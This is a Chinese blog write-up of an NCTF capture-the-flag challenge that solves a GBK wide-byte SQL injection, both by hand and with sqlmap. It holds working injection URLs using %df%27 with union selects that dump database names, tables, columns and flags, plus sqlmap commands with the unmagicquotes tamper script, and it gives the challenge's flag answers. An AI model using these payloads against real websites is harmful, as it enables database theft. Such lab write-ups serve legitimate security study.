南邮nctf-sql injection 3(宽字节注入) 手注+sqlmap

迷南。 2022-03-02 07:22 254阅读 0赞

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70][]

**题目地址：**[http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1][http_chinalover.sinaapp.com_SQL-GBK_index.php_id_1]

### 进入题目后先简单尝试一下。 ###

![20190319231414942.png][]

![20190319231555195.png][]

![20190319231724596.png][]

很明显的**宽字节注入**。

宽字节注入就是用一个大于128的**十六进制数**来吃掉转义符\\，**gbk编码**，字节作为一个字符的编码

关于宽字节注入漏洞具体说明度娘一搜就出来了，这里不再赘述。

--------------------

# 手工注入 #

### **1、判断列数：** ###

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 1%23

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 2%23

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 3%23

order by 3 时报错，说明只有两列。

### **2、各类信息：** ###

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2 
    union select 2,(concat_ws(char(32,58,32),user(),database(),version()))%23

sae-chinalover@123.125.23.212 : sae-chinalover : 5.5.52-0ubuntu0.14.04.1

### **3、库名：** ###

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2 union select 2,database()%23

sae-chinalover

### **4、表名：** ###

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2 
    union select 2,group_concat(table_name) 
    from information_schema.tables 
    where table_schema=database()%23

ctf,ctf2,ctf3,ctf4,news

### **5、ctf4表的列名：** ###

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2 
    union select 2,group_concat(column_name) 
    from information_schema.columns 
    where table_name=0x63746634%23

id,flag

**这里注意：**要将表名ctf4转为16进制

**这里提供一个字符串转16进制的网站：**

[http://www.5ixuexiwang.com/str/hex.php][http_www.5ixuexiwang.com_str_hex.php]

转了16进制之后记得在前面加上0x

### **6、flag列的数据：** ###

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2 
    union select 2,(select flag from ctf4)%23

flag\{this\_is\_sqli\_flag\}

--------------------

#  关于flag的答案 #

这道题提交的答案各不相同。除了刚刚在ctf4中的flag，在ctf2中还有个nctf的flag。

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 
    union select 1,group_concat(id,content) from ctf2%23

![20190320233901479.png][]

nctf\{query\_in\_mysql\}

还有一个答案是我在度娘搜到别人提交的，在ctf4，不过我在ctf4已经找不到这个答案了。

nctf\{gbk\_3sqli\}

--------------------

# sqlmap跑法 #

### **1、查看有哪些库：** ###

sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes --dbs

这个时侯就要用到一个脚本了：

**脚本名：**unmagicquotes.py

**作用：**宽字符绕过

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 1][]

### **2、表名：** ###

sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` --tables

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 2][]

### 3、列名： ###

sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` -T ctf4 --columns

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 3][]

### 4、flag列的数据： ###

sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` -T ctf4 -C flag

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 4][]

flag\{this\_is\_sqli\_flag\}

--------------------

**这就是本题宽字节注入的两种解法。**

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70]: /images/20220302/1f43db3d59ed4cde85fcc1c09fabc198.png
[http_chinalover.sinaapp.com_SQL-GBK_index.php_id_1]: http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1
[20190319231414942.png]: /images/20220302/826b8ae8ad8648988d97750e57a3d883.png
[20190319231555195.png]: /images/20220302/c394fedfb3e14a2895f90d655360465c.png
[20190319231724596.png]: /images/20220302/d474387ce0eb432b8d663d4630945230.png
[http_www.5ixuexiwang.com_str_hex.php]: http://www.5ixuexiwang.com/str/hex.php
[20190320233901479.png]: /images/20220302/7807e312582b4c55861af2f41f016280.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 1]: /images/20220302/67bd7daa26b0448fa2bafc64d4501a39.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 2]: /images/20220302/9ab3d1ca0bb1497ba8dd89eb1e142ec8.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 3]: /images/20220302/67978daa568a4cb39e9ac50b04a0ea97.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2R5d182NjY2NjY_size_16_color_FFFFFF_t_70 4]: /images/20220302/42ca1f641d374cb491f3dd783990af21.png